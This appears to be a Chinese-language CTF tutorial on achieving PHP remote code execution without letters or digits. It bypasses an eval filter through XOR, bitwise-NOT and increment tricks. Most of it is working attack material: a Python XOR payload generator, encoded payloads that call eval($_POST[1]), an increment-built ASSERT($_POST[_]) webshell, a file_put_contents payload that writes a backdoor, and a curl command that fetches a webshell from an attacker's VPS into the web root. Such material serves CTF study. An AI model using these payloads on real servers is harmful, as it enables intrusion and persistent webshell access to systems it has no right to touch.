无数字字母RCE,这是一个老生常谈的问题,就是不利用数字和字母构造出webshell,从而能够执行我们的命令。
<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if(preg_match("/[A-Za-z0-9]+/",$code)){die("hacker!");
}
@eval($code);
?>例如这样的过滤,就要利用各种非字母数字的字符,通过各种变换如异或、取反、自增等方法构造出单个的字母字符,然后将这些构造出的字符拼接成一个函数名,然后就可以达成RCE
异或^
这里的异或,指的是php按位异或,在php中,两个字符进行异或操作后,得到的依然是一个字符,所以说当我们想得到a-z中某个字母时,就可以找到两个非字母数字的字符,只要他们俩的异或结果是这个字母即可。而在php中,两个字符进行异或时,会先将字符串转换成ascii码值,再将这个值转换成二进制,然后一位一位的进行按位异或,异或的规则是:1^1=0,1^0=1,0^1=1,0^0=0,简单的来说就是相同为零,不同为一
具体参考这个表格:
假如说我们想要构造出小写字母a,按照上表,a的二进制为01100001,那我们就可以选择两个非字母数字的字符进行异或,这里有很多种选法,我选择的是@和!这两个,就能成功异或出字母a
import re
import urllib.parse
import requestsdef generate_xor_expression(payload, filter_regex):"""根据目标 payload 和过滤正则表达式,生成异或表达式。参数:payload: 目标字符串filter_regex: 用于过滤字符的正则表达式返回:构造的异或表达式字符串"""xor_1 = ''xor_2 = ''usable_chars = []# 找到没有被过滤的可用字符for i in range(0xff):if chr(i) not in filter_regex:usable_chars.append(chr(i))# 遍历目标 payload 的每个字符,找到对应的异或字符对for k in range(len(payload)):for i in usable_chars:if chr(ord(i) ^ 127) == payload[k]: # 检查两个字符异或结果是否等于目标字符xor_1 += ixor_2 += chr(127)continue# 构建最终的表达式,将字符进行URL编码return "('" + urllib.parse.quote(xor_1) + "'^'" + urllib.parse.quote(xor_2) + "')"# 测试函数
if __name__ == "__main__":payload = "eval($_POST[1]);" # 要生成的目标 payloadfilter_regex = r'[a-zA-Z0-9]' # 定义过滤正则表达式result = generate_xor_expression(payload, filter_regex) # 调用函数print(result) # 打印最终生成的表达式这是一个简单的异或构造的脚本,可以生成payload
取反~
<?php
$a=urlencode(~'assert');
echo $a;
echo '666';
$b=urlencode(~'eval($_POST[1]);');
echo $b;就像这样,得到结果为:
(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);
自增
利用自增,例如
"a"++ => "b"
所以,只要能够得到一个字符,我们就可以通过自增或自减的方式得到所有的字母。那么,要如何得到一个字母,例如A,在PHP中,强制连接数组和字符串的话,数组将会被转化为字符串,其值为“Array”。再取这个字符串的第一个字母,就可以得到A。
大佬的payload:
<?php
$_=[].''; //得到"Array"
$___ = $_[$__]; //得到"A",$__没有定义,默认为False也即0,此时$___="A"
$__ = $___; //$__="A"
$_ = $___; //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"S",此时$__="S"
$___ .= $__; //$___="AS"
$___ .= $__; //$___="ASS"
$__ = $_; //$__="A"
$__++;$__++;$__++;$__++; //得到"E",此时$__="E"
$___ .= $__; //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++; //得到"R",此时$__="R"
$___ .= $__; //$___="ASSER"
$__++;$__++; //得到"T",此时$__="T"
$___ .= $__; //$___="ASSERT"
$__ = $_; //$__="A"
$____ = "_"; //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"P",此时$__="P"
$____ .= $__; //$____="_P"
$__ = $_; //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"O",此时$__="O"
$____ .= $__; //$____="_PO"
$__++;$__++;$__++;$__++; //得到"S",此时$__="S"
$____ .= $__; //$____="_POS"
$__++; //得到"T",此时$__="T"
$____ .= $__; //$____="_POST"
$_ = $$____; //$_=$_POST
$___($_[_]); //ASSERT($POST[_])PHP7和PHP5中的特性
assert是无字母数字RCE中很重要的一个函数,但是php5和php7中的这个函数是有区别的。在php5中,assert是一个函数,因此我们可以动态调用。但是在PHP7中,assert不再是一个函数,而是变成了一个语言结构,不能再作为函数名动态执行代码。在php7中,可以通过($a)()这样的方式来执行命令,也就是说我们对phpinfo取反之后就可以直接执行了,亦或用file_put_contents来写shell。
例如php7中想执行phpinfo(),可以写成(phpinfo)(),利用取反构造payload:
(~%8F%97%8F%96%91%99%90)() // phpinfo
同理也可以直接写马
file_put_contents('4.php','<?php eval(\$_POST[1]);');
(~(%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C))(~(%CB%D1%8F%97%8F),~(%C3%C0%8F%97%8F%DF%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4));在php5中,不支持用($a)()这样的语句来调用函数,但是在php5中assert是一个函数,我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码
无字母数字webshell之提高篇 | 离别歌这里面有,等我仔细攻读一下
临时文件
临时文件目录:
Linux临时文件主要存储在/tmp/目录下,格式通常是(/tmp/php[6个随机字符])
Windows临时文件主要存储在C:/Windows/目录下,格式通常是(C:/Windows/php[4个随机字符].tmp)
大概就是在自己的vps上写一个命令执行的txt,然后在题目post该命令
curl http://your_vps/1.txt > /var/www/html/1.php然后 ?cmd=?><?=`/??p/p?p??????`;
为什么可以这样执行呢?因为在linux里,如果一个文件里有命令,是可以通过这个文件名执行命令的,这里我们相当于使用临时文件执行了命令
)
★★★★★)